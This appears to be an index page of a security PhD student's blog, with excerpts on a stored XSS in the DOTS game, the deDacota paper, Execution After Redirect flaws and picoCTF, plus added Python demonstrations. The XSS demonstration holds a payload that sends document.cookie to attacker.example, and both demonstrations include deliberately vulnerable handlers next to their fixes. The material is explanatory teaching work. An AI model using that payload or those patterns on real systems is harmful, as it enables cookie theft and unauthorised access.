Stories from a PhD

Musings of a Computer Security PhD Student

Stored XSS in Popular DOTS Mobile Game


So you may or may not be familiar with the popular mobile game DOTS. Well, if you haven’t checked it out, I urge you to. It’s a lot of fun, and it’s available on both Android and iOS.

Anyway, while playing this game, I discovered a stored XSS vulnerability in DOTS. Here’s how it came about.

XSS in a Mobile Game?

So, while playing the multiplayer mode of DOTS, I noticed that there was a "Share" feature. This feature lets you share (or brag about) your scores with a friend. The app uploads your scores and player names to the web server (I haven't looked into the exact HTTP request it makes), gets back a unique URL, and then lets you send that URL to someone. In other words, the uploaded data is stored server-side and rendered to whoever opens the link, which is exactly the setup in which a stored XSS can appear.

deDacota: Toward Preventing Server-Side XSS via Automatic Code and Data Separation


This post is an overview of the paper deDacota: Toward Preventing Server-Side XSS via Automatic Code and Data Separation, which was written by yours truly as a collaboration between the UC Santa Barbara Seclab and Microsoft Research. I'm very excited to present this work at the 2013 ACM Conference on Computer and Communications Security in Berlin. If you're there, please say hi! (Also, if you have suggestions of places or things to do in Europe, let me know!)

So, what is deDacota?


deDacota is my attempt to tackle the Cross-Site Scripting (XSS) problem. I know what you're thinking: there has been a ton of excellent research in this area. How could this work possibly be new?

Previously, we as a research community have looked at XSS vulnerabilities as a problem of missing sanitization. Those pesky web developers (I am one, so I can say this) just can't seem to properly sanitize the untrusted input that their applications output.

You’d think that after all this time (at least a decade, if not more), the XSS problem would be done and solved. Just sanitize those inputs!
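The bug class behind both posts above, as an added example that is not code from DOTS, from deDacota, or from this blog. The share-page template, the attacker's "player name" and the toy browser that applies a CSP are all constructed here. It shows the unescaped rendering that turns a stored name into script for every viewer of the share URL, the sanitization fix that the deDacota post says developers keep getting wrong, and a toy form of code/data separation: the template's static inline script is moved to an external file at build time and a `script-src 'self'` policy then makes any injected inline script inert even when the data was never escaped. deDacota's actual program rewriting is not reproduced; this toy only handles static inline scripts.

```python
import hashlib
import html
import re

# Constructed sample template for a "share my score" page. It is not DOTS's
# real markup; it just has the shape the post describes: uploaded data
# (name, score) rendered into a public page, plus one legitimate inline script.
SHARE_TEMPLATE = """<html><body>
<h1>{name} scored {score} points!</h1>
<script>setupShareButtons();</script>
</body></html>"""

# Constructed attacker payload: a "player name" chosen to break out of the <h1>.
EVIL_NAME = '</h1><script>new Image().src="https://attacker.example/?c="+document.cookie</script>'


def render_unsafe(template, name, score):
    """The stored-XSS bug: data is interpolated straight into HTML, so a name
    containing markup becomes script for everyone who opens the share URL."""
    return template.format(name=name, score=score)


def render_escaped(template, name, score):
    """Fix 1, sanitization: escape the name for an HTML text context and force
    the score to be a number. Correct only because both slots sit in HTML body
    context; a slot inside <script> or an attribute needs a different encoder."""
    return template.format(name=html.escape(name, quote=True), score=int(score))


INLINE_SCRIPT = re.compile(r"<script>(.*?)</script>", re.S)


def separate_code_and_data(template):
    """Fix 2, code/data separation (the deDacota idea, in toy form): at build
    time move each static inline script of the *template* into an external
    file and ship a CSP that forbids inline script. Returns the rewritten
    template, the external files, and the CSP value."""
    externals = {}

    def to_external(m):
        body = m.group(1)
        path = "/static/" + hashlib.sha256(body.encode()).hexdigest()[:16] + ".js"
        externals[path] = body
        return '<script src="%s"></script>' % path

    return INLINE_SCRIPT.sub(to_external, template), externals, "script-src 'self'"


SCRIPT_TAG = re.compile(r'<script(?:\s+src="([^"]*)")?>(.*?)</script>', re.S)


def scripts_browser_would_run(page, csp):
    """Toy model of a browser enforcing script-src 'self': same-origin external
    scripts run, inline bodies do not. With csp=None everything runs."""
    ran = []
    for src, body in SCRIPT_TAG.findall(page):
        if src:
            if csp is None or src.startswith("/"):
                ran.append(("external", src))
        elif csp is None:
            ran.append(("inline", body.strip()))
    return ran


def demo():
    """Run the attacker's name through all three renderings."""
    unsafe = scripts_browser_would_run(render_unsafe(SHARE_TEMPLATE, EVIL_NAME, 42), None)
    escaped = scripts_browser_would_run(render_escaped(SHARE_TEMPLATE, EVIL_NAME, 42), None)
    sep_template, files, csp = separate_code_and_data(SHARE_TEMPLATE)
    # Same sanitization bug as render_unsafe, but the CSP makes the injected
    # inline script inert while the relocated legitimate script still runs.
    separated = scripts_browser_would_run(render_unsafe(sep_template, EVIL_NAME, 42), csp)
    return {"unsafe": unsafe, "escaped": escaped, "separated": separated,
            "external_files": files}


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Running `demo()` shows the unsafe page executing two inline scripts (the attacker's and the legitimate one), the escaped page executing only the legitimate one, and the separated page executing only the external file. The separation fix is the stronger of the two because it does not depend on every output slot being escaped correctly, but a real deployment also has to strip inline event handlers and `javascript:` URLs, which this toy ignores.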

Back That Data Up: A Cautionary Tale


This is a true story that happened recently, and I wanted to share/document it here as a reminder to always back up your research data.

Turns out I was so tired after the 24-hour coding blur that was the 2013 iCTF that I didn't back up the database. Or if I did, I didn't check it into our SVN repo. Then, to make matters worse, I didn't make a note to back up the data later.

Simple Bash Function: SSH and Keep Same Directory


Here's a quick Bash function that I whipped up to SSH into a server and land in the same directory I was in locally. The use case for me is that I have a Dropbox folder shared between my laptop and the server. Sometimes I need to run something (an experiment, code, whatever) on the server, and it was becoming annoying to ssh in and then cd to the correct directory every time.

I call this function sshere (ssh here):

Feel free to use, steal, or adapt to your needs.

picoCTF Preparations


Getting Started

picoCTF is an awesome hacking competition aimed at high school students. The great folks at CMU and PPP are putting on this innovative competition. Some high school students asked me for pointers to prepare for picoCTF, so I invited them to our weekly hacking group and talked about the hacking mindset and basic tools. They amazed me with their knowledge; I was cutting my teeth on TI-83 BASIC programming in math class when I was their age.

What follows are my notes on the lecture I gave and the discussion that we had. I hope other young hackers find these resources useful while preparing for picoCTF.

Hacker Mindset

First and foremost, we need to understand how the hacker thinks. How should you think when you’re trying to break a program?

Some Classic Literature Recommendations


Recently, a friend asked me to recommend some classic English-language books. He's Persian and was born in Iran, so it was fun to give him some of my favorite American books. I decided to put that list here in case you're looking for a book to read.


One of the funniest books I’ve ever read. About WWII and it’s sad and funny at the same time.

A Confederacy of Dunces

The funniest book I’ve ever read. Captures the spirit of New Orleans and the characters are outlandish. Plus the book was published after the author committed suicide, so the whole book’s got a sad tinge.

Overview of Execution After Redirect Web Application Vulnerabilities


Hi all, I'm here to talk about a little-known web vulnerability that Bryce Boe already touched on. Execution After Redirect (EAR) vulnerabilities are logic flaws in web applications that can lead to information disclosure and broken access control.

What’s an EAR?

Well, an Execution After Redirect (EAR) flaw occurs when a developer issues an HTTP redirect, typically through a web framework helper, and assumes that execution stops there. In many frameworks it does not: the redirect helper only sets the status code and the Location header and then returns, so whatever follows it in the handler (rendering a template, writing to the database, deleting a record) still runs. A client that simply ignores the Location header sees the rendered data, and any side effect after the redirect happens regardless of the access check that triggered it.
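The flaw as an added example, which is not code from this post or from any real framework. The dispatcher, the `redirect()` helper and the account store are constructed here: the helper records a 302 and returns normally, the way many framework redirect helpers behave, and three handlers show the information-disclosure variant, the broken-access-control variant, and the one-line fix.

```python
import copy


class Response:
    def __init__(self):
        self.status = 200
        self.headers = {}
        self.body = ""


class Request:
    def __init__(self, user, params=None):
        self.user = user            # None means anonymous
        self.params = params or {}


# Constructed data store for the example.
ACCOUNTS = {"alice": {"balance": 1200}, "bob": {"balance": 300}}


def redirect(resp, location):
    """Toy framework redirect helper: it records a 302 and returns normally.
    Nothing here stops the calling handler, which is the EAR trap."""
    resp.status = 302
    resp.headers["Location"] = location


def list_accounts_vulnerable(req, resp, store):
    """Information disclosure: the redirect is set, but rendering continues,
    so the 302 response carries every account in its body."""
    if req.user != "admin":
        redirect(resp, "/login")
    resp.body = repr(store)
    return resp


def delete_account_vulnerable(req, resp, store):
    """Broken access control: the non-admin is sent to /login, but the
    deletion below still executes."""
    if req.user != "admin":
        redirect(resp, "/login")
    store.pop(req.params["name"], None)
    resp.body = "deleted"
    return resp


def delete_account_fixed(req, resp, store):
    """The fix: return right after redirecting so nothing else runs."""
    if req.user != "admin":
        redirect(resp, "/login")
        return resp
    store.pop(req.params["name"], None)
    resp.body = "deleted"
    return resp


def run(handler, user, params=None):
    """Dispatch one request against a fresh copy of the store and report the
    status, the body a client ignoring Location would read, and what is left
    in the store afterwards."""
    store = copy.deepcopy(ACCOUNTS)
    resp = handler(Request(user, params), Response(), store)
    return resp.status, resp.body, sorted(store)


if __name__ == "__main__":
    print(run(list_accounts_vulnerable, None))
    print(run(delete_account_vulnerable, None, {"name": "alice"}))
    print(run(delete_account_fixed, None, {"name": "alice"}))
```

The anonymous request to `list_accounts_vulnerable` comes back as a 302 whose body is the full account list, and the anonymous `delete_account_vulnerable` request really removes the account even though the user was "sent" to the login page. Frameworks whose redirect helper raises or halts instead of returning close this trap at the framework level; when yours does not, every redirect that guards a check needs its own `return`.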

Paper Review: Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications.


What is this?

In an effort to improve my writing and analysis skills, I'm going to review papers in fewer than 500 words each. This is my first attempt.


Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications is a paper written by Davide Balzarotti et al., and was published at the IEEE Symposium on Security and Privacy in 2008.